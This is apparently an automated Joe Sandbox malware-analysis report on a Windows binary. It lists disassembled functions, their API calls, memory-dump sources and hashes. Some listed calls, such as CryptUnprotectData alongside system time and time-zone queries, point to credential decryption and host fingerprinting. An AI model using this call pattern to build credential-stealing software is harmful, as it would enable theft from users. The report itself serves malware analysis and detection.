                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: d8ae073219b4f7dbacc430225eb8de1eaa3bc3813d9d06ee6833aee38eec3a47
                                          • Instruction ID: 29ecc60fa1111aa87901a832d7ef614b78f253f9e9d63dd278156d9338de7a47
                                          • Opcode Fuzzy Hash: d8ae073219b4f7dbacc430225eb8de1eaa3bc3813d9d06ee6833aee38eec3a47
                                          • Instruction Fuzzy Hash: 6411DF74200209EFDB04CFA4E985AAA37A9AB8A314F10A448FD199B240EB35B841DB60
                                          Function 00EA7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EB0E00,00000000,?), ref: 00EA79B0
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA79B7
                                          • GetLocalTime.KERNEL32(?,?,?,?,?,00EB0E00,00000000,?), ref: 00EA79C4
                                          • wsprintfA.USER32 ref: 00EA79F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                                          • String ID:
                                          • API String ID: 377395780-0
                                          • Opcode ID: 940b6bd5134805ce1420501ec1ebfbfa74b8f8d624a24e498fd96b475f6fdb63
                                          • Instruction ID: 910988b605e9634a1f01c620fa146efc2aedf463e489d2b4a35bf89b1a93aa33
                                          • Opcode Fuzzy Hash: 940b6bd5134805ce1420501ec1ebfbfa74b8f8d624a24e498fd96b475f6fdb63
                                          • Instruction Fuzzy Hash: 6B1118B2A04118EACB14DFC9D945BBEB7F8EB4CB11F10411AFA45A2284D2395940C7B0
                                          Function 00EA7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00BBF368,00000000,?,00EB0E10,00000000,?,00000000,00000000), ref: 00EA7A63
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7A6A
                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00BBF368,00000000,?,00EB0E10,00000000,?,00000000,00000000,?), ref: 00EA7A7D
                                          • wsprintfA.USER32 ref: 00EA7AB7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                          • String ID:
                                          • API String ID: 3317088062-0
                                          • Opcode ID: 0d04cf1127004c473777090fa7133790945858eeae40df95b349bb23329a9b32
                                          • Instruction ID: 5663b8283a9b9bc171ecd07f4c9606610c3716002a237a317ee7153003e4d31b
                                          • Opcode Fuzzy Hash: 0d04cf1127004c473777090fa7133790945858eeae40df95b349bb23329a9b32
                                          • Instruction Fuzzy Hash: 2B1182B1A46228EBDB20CF54DC45F9AB778FB05721F104395E906A72C0C7792E40CF50
                                          Function 01263912 Relevance: 5.4, Strings: 3, Instructions: 1635COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: B r$S0l$$v;
                                          • API String ID: 0-4052388050
                                          • Opcode ID: 1dca273c1c4aab5554af464f4eff3398b1b304f03e68ca3ce5b65b36a792fc8a
                                          • Instruction ID: 171a6da25626e9e8e0f6f7b3f956e2eddc4fe44dadba039e65a50937dca6aea9
                                          • Opcode Fuzzy Hash: 1dca273c1c4aab5554af464f4eff3398b1b304f03e68ca3ce5b65b36a792fc8a
                                          • Instruction Fuzzy Hash: 94B2E7F360C204AFE304AE2DEC8567ABBE9EF94720F1A453DE6C4C7744E63598058696
                                          Function 00EA3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.COMBASE(00EAE118,00000000,00000001,00EAE108,00000000), ref: 00EA3758
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EA37B0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID:
                                          • API String ID: 123533781-0
                                          • Opcode ID: cfa89f57cc27bc489f89598d536cedb6feb088a55a6f65056ba462d9f43ce28c
                                          • Instruction ID: 8d07c3ff0eab151b75f6a6b6e40e9c49a988fe182ce5b504481d34afd8356f78
                                          • Opcode Fuzzy Hash: cfa89f57cc27bc489f89598d536cedb6feb088a55a6f65056ba462d9f43ce28c
                                          • Instruction Fuzzy Hash: 9641F870A00A289FDB24DB58CC95B9BB7B5BB49702F4051D8F609EB2D0D7716E85CF50
                                          Function 00E99B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E99B84
                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E99BA3
                                          • LocalFree.KERNEL32(?), ref: 00E99BD3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                          • String ID:
                                          • API String ID: 2068576380-0
                                          • Opcode ID: 3d7cec0e9c6345bb6eddc227250f5e183c4cda2c3177404c01568cde8f44ac5b
                                          • Instruction ID: 97481996a9759a5780524994c8da2b7229b7ebb6a039addb8026aae117eb83fd
                                          • Opcode Fuzzy Hash: 3d7cec0e9c6345bb6eddc227250f5e183c4cda2c3177404c01568cde8f44ac5b
                                          • Instruction Fuzzy Hash: 43110CB8A01209DFCB04DF98D985AAE77B5FF88300F104558ED15A7350D775AE10CF61
                                          Function 0124F5ED Relevance: 4.1, Strings: 2, Instructions: 1618COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tw{$wVk
                                          • API String ID: 0-1620743359
                                          • Opcode ID: a78288a6a6dc55d50409acc81165e8d99c41f12280dd99cb53737faf1b48303f
                                          • Instruction ID: 557fbe6baa84c7a24621b5c4fb0a484d66bae9644e6caf10d3f50c290684463e
                                          • Opcode Fuzzy Hash: a78288a6a6dc55d50409acc81165e8d99c41f12280dd99cb53737faf1b48303f
                                          • Instruction Fuzzy Hash: 77B2E5F360C2049FE304AE2DEC8567AFBE9EB94720F16493DE6C4C7744EA3598058697
                                          Function 0113032F Relevance: .2, Instructions: 194COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf3e001ef93b7bba975e1c9c9ea5d0a8880bbcd3dd788cf31a337bc47f28d2f1
                                          • Instruction ID: dc9768234719fe1bb208dc7717a9bcbe628c8d9749f86966d65b9a21d96dcedd
                                          • Opcode Fuzzy Hash: cf3e001ef93b7bba975e1c9c9ea5d0a8880bbcd3dd788cf31a337bc47f28d2f1
                                          • Instruction Fuzzy Hash: 66516CF36182049FE7086D3DED9477BB79AEBD4320F2B873DE685C2B84E93558058151
                                          Function 011E2E08 Relevance: .2, Instructions: 156COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f5d5090aecc4a0f249834fa8acb74440e0f4149803a32fef4da2ab9ad3f540c
                                          • Instruction ID: 96ba4ff513a9f048aa1dba84479aba43c2d89c4015621f1f379bc07092a83747
                                          • Opcode Fuzzy Hash: 2f5d5090aecc4a0f249834fa8acb74440e0f4149803a32fef4da2ab9ad3f540c
                                          • Instruction Fuzzy Hash: 2341D0B3B142241BD208193CED99777BA9DDB44530F2A023EED42E3BC0F962DD0442D5
                                          Function 01163E11 Relevance: .1, Instructions: 149COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f83851d5cd50959e1359ec417916a061ff0f90594e514e5a4741fd9e4a03f6a1
                                          • Instruction ID: 6ea1b19746733589500a272b9da91adb1d78e978d6f0b6cf7a65a98924af99a8
                                          • Opcode Fuzzy Hash: f83851d5cd50959e1359ec417916a061ff0f90594e514e5a4741fd9e4a03f6a1
                                          • Instruction Fuzzy Hash: 234118F3A097049FE344AE19DC8477AB3E6EBD8310F2A453DDAC447394EA39AC458746
                                          Function 0119BB7F Relevance: .1, Instructions: 125COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e37493c3a0c27c08b8ff34af85c1217f23e700753c6d0d4b41d8e588c268da0
                                          • Instruction ID: 3dc9290c6ad6559bbab1ef7d9948200eeda7e28aa79098f36146d98f700ba8ae
                                          • Opcode Fuzzy Hash: 0e37493c3a0c27c08b8ff34af85c1217f23e700753c6d0d4b41d8e588c268da0
                                          • Instruction Fuzzy Hash: B94110F3E082108BE305AE19DC4176AB7E5EF94720F1A893DD9D887384EA35580087C3
                                          Function 00EA9750 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          Function 00EA0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
